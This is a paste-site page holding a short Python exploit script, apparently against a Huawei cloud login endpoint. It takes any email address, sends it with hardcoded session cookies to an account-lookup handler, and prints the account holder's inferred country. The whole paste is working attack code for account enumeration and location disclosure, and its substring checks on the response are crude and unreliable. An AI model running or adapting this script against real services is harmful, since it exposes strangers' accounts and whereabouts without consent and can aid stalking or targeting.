Huawei cloud- Track Users Location Vulnerability

From Ungracious Wolf, 4 Months ago, written in Python, viewed 352 times.
URL https://secploit.com/view/0393150f Embed
Download Paste or View Raw
  1. import requests
  2. import json
  3. import sys
  4. cookies = {
  5.     'JSESSIONID': 'C235F1E3904C47DEB0582BCA51E4E1E0',
  6.     'AWSELB': '33BD71591CCB450E0A6EA8BA9B76C144C8998129812476C4C2E007F768A4339202EF886234D0110F6D9E1FCD088BDB1C02556D7C87C602A30F16B825E93A71A22E65376FE2',
  7. }
  8.  
  9. headers = {
  10.     'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0',
  11.     'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
  12.     'X-Requested-With': 'XMLHttpRequest',
  13.     'Referer': 'http://hwid5.vmall.com/CAS/portal/cloudLogin.html?validated=true&themeName=red&service=https://www.hicloud.com:443/others/login.action&loginChannel=1000002&reqClientType=1&lang=en-us',
  14. }
  15.  
  16. params = (
  17.     ('reflushCode', '0.2930746929667186'),
  18. )
  19. print ("""
  20.           [+]\033[1;33;40m Huawei Users Locations disclosure Vulnerability
  21.           [+] founded by : Lawrence Amer
  22.           [+] site : lawrenceamer.me
  23. """)
  24. email = raw_input("enter an email to track location:")
  25. data = 'userAccount=%s&reqClientType=1&isGetAll=3&accountType=1'%(email)
  26.  
  27. url = requests.post('http://hwid5.vmall.com/CAS/ajaxHandler/isExsitUser', headers=headers, params=params, cookies=cookies, data=data, verify=False)
  28.  
  29. resp = url.text
  30. if '961' in resp:
  31.    print("\033[1;31;40m [~] Huawei User %s is Located in Lebanon ")%(email)
  32. if '95' in resp:
  33.    print("\033[1;31;40m [~] Huawei User %s is Located in Myanmar ")%(email)
  34. if '86' in resp:
  35.    print("\033[1;31;40m [~] Huawei User %s is Located in China ")%(email)
  36.  
  37.  
  38.  

Reply to "Huawei cloud- Track Users Location Vulnerability "

Here you can reply to the paste above